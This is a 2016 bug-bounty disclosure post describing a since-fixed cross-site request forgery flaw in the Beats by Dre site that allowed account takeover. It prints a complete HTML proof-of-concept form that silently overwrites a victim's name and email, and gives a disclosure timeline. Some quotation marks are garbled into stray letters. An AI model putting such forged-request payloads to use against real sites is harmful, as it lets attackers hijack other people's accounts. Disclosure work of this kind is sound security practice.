Beats By Dre Cross Site Request Forgery
Posted on 02 August 2016
Hello, I am Aaditya Purani, and i had found an CSRF (Cross Site Request Forgery ) on Beats by Dr.Dre which could lead to full Account Takeover and Information change by Just sending a Malicious crafted Link to the user. Proof of Concept: <html> <!-- CSRF PoC - By Aaditya Purani --> <body> <form method='POST' action=" https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer "> <input type="hidden" name="firstName" value="hacked" /> <input type="hidden" name="lastName" value="hackerone" /> <input type="hidden" name="emailAddress" value="victimsemail@gmail.com" /> < input type="hidden" name="zip" value="" /> <input type="hidden" name="phone" value="" /> <input type="hidden" name="csrf_token" value=" VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91 " /> <input type="hidden" name="isEmailSubscription" value="true" /> <input type="hidden" name="isAlreadySubscribed" value="false" /> <input type="submit" value="Submit request" /> </form> </body> </html> Response : {aisCustomerSavedSuccessfullya: true, aunsubscribeStatusa: null } -> Attack Successful {aisCustomerSavedSuccessfullya: false, aunsubscribeStatusa: null } -> Attack Unsuccessful Clicking on this Link, would change details of any User. I have wrote an Complete Blog here: https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/ Video PoC: https://youtu.be/2SfmmWxiDck Apple has Acknowledged me in their Hall of fame: https://support.apple.com/en-us/HT201536 *Timeline:* October 8th 2015 a Reported October 23th 2015 a Triaged November 6th 2015 a Responded that aMatter is being investigateda January 18th 2016 a Fixed June 20th 2016 a Acknowledged
